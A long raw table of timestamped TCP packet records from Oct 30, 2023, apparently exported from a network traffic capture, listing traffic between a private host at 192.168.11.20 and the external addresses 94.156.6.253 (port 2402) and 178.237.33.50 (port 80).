                                                                                                                                                                                        Oct 30, 2023 14:17:54.338103056 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.338188887 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.338258028 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.338258028 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.338346004 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.338375092 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.338447094 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.338516951 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.338571072 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.338593960 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.338680983 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.338754892 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.338845015 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.376534939 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.376585960 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.376626015 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.376666069 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.376916885 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.554419041 CET8050096178.237.33.50192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.554649115 CET5009680192.168.11.20178.237.33.50
                                                                                                                                                                                        Oct 30, 2023 14:17:54.574955940 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.575030088 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.575087070 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.575139999 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.575191975 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.575395107 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.575874090 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.575946093 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.576015949 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.576101065 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.576122046 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.576200008 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.576257944 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.576278925 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.576347113 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.576406002 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.576432943 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.576571941 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.576591969 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.576659918 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.576723099 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.576776981 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.576832056 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.576836109 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.576910973 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.576940060 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.576999903 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.577059031 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.577095032 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.577131987 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.577195883 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.577224970 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.577277899 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.577341080 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.577394962 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.577433109 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.577464104 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.577536106 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.577589989 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.577601910 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.577676058 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.577732086 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.577759027 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.577807903 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.577824116 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.577903986 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.577955008 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.577969074 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.578041077 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.578083038 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.578110933 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.578182936 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.578212976 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.578263044 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.578322887 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.578377962 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.578422070 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.578444958 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.578485012 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.578542948 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.578600883 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.578654051 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.578670025 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.578735113 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.578854084 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.578957081 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.579030037 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.579092979 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.579145908 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.579197884 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.579251051 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.579305887 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.579308987 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.579370022 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.579391003 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.579463005 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.579499960 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.579536915 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.579601049 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.579696894 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.579721928 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.579797029 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.579824924 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.579875946 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.579935074 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.579982996 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.579997063 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.580147028 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.580152035 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.580286980 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.580296040 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.580430984 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.580487013 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.580542088 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.580571890 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.580621958 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.580735922 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.580842018 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.580902100 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.580904007 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.580984116 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.581039906 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.581093073 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.581151009 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.581151962 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.581229925 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.581281900 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.581293106 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.581365108 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.581506014 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.581521034 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.581556082 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.581614971 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.581830025 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.614738941 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.614813089 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.614871025 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.614940882 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.614984989 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.615014076 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.615092039 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.615149975 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.615163088 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.615232944 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.615264893 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.615448952 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.819602966 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.819694996 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.819756031 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.819809914 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.819855928 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.819880962 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.819957972 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.820045948 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.820060968 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.820147038 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.820153952 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.820234060 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.820287943 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.820342064 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.820396900 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.820502043 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.820602894 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.820789099 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.820846081 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.820900917 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.820954084 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.821048021 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.821062088 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.821119070 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.821136951 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.821211100 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.821264982 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.821317911 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.821327925 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.821456909 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.821487904 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.821594000 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.821651936 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.821671963 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.821736097 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.821796894 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.821814060 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.821877956 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.821934938 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.821980953 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.822000027 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.822076082 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.822124958 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.822138071 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.822210073 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.822264910 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.822304964 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.822334051 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.822369099 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.822424889 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.822493076 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.822551012 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.822575092 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.822624922 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.822638988 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.822715998 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.822777987 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.822786093 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.822860956 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.822922945 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.822982073 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.823071957 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.825191975 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.825265884 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.825321913 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.825377941 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.825433016 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.825445890 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.825515032 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.825532913 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.825613022 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.825669050 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.825726986 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.825831890 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.825881958 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.825901031 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.825979948 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.826040983 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.826100111 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.826127052 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.826184034 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.826205969 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.826268911 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.826333046 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.826373100 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.826405048 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.826476097 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.826503038 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.826559067 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.826623917 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.826684952 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.826689959 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.826767921 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.826828003 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.826864004 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.826900959 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.826965094 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.827019930 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.827029943 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.827075005 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.827115059 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.827182055 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.827236891 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.827246904 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.827320099 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.827322006 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.827397108 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.827454090 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.827507019 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.827519894 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.827589035 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.827635050 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.827657938 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.827733040 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.827778101 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.827804089 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.827878952 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.827939034 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.827958107 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.828042030 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.828135967 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.828139067 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.828213930 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.828219891 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.828296900 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.828357935 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.828417063 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.828475952 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.828479052 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.828530073 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.828561068 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.828622103 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.828639984 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.828716040 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.828774929 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.828830957 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.828841925 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.828917980 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.828979015 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.828986883 CET500952402192.168.11.2094.156.6.253
                                                                                                                                                                                        Oct 30, 2023 14:17:54.829060078 CET24025009594.156.6.253192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:54.829121113 CET24025009594.156.6.253192.168.11.20
